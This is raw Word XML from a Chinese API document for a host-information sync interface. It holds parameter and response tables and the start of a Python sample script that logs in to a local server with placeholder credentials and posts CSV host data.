          <w:p w14:paraId="6C7DB41E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D73CC19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E69B5D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>导入的基准（１：hostname为基准， ２：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>为基准），只能是１或者２</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0ABA7526" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34C6CCDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49ADE6A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F760FCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F48E65D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统类型（１：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>liunx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> , 2:windows）, 只能是１或者２</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="405B8D58" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E2CF3D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D93726C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C99619D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5342AFB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账号唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="134A339A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA4B20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "code": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "message": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "data": "success"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010DC99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>或type错误返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EBA87B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "code": 100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "message": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/type　error",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "data": </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>fail“</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB5ACA"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073"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="52E8971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0C6C4A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74725F1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62B769FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="316A37BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3778C5AA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FFA0462" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7586FD10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A74A5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ADCE637" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，成功200， 失败100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A54C3A9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F43E400" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A8E944A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ADBAEE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48D0B8F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>失败原因描述，code=200时，为null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="37BAD179" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70E2DB65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A07A9F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="230FBDA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DEB5223" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字符“success”或"fail"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1502D0BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>主机信息同步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280EF54C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  该脚本实现的功能：把.csv文件读取数据，并拼接为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>insert_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，把</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>insert_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,通过调用外部接口external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/host/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostInfoSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，把数据同步到mongo数据库中</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  脚本使用的方法：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  　　　１、在当前目录放.csv文件，csv文件的列为</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  　　</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>２、安装相关依赖包，执行python endscripts.py即可</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import sys</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import csv</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>import glob</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import requests</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defaultencoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 'utf-8'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.getdefaultencoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() != </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defaultencoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    reload(sys)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.setdefaultencoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defaultencoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "xxx"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>choiceType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 数据集绝对路径以及文件名称</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csvx_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>glob.glob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('*.csv')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">[0] + '/'+ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csvx_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[0]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 'http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/host/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostInfoSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'%(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/v1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method="POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>time.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
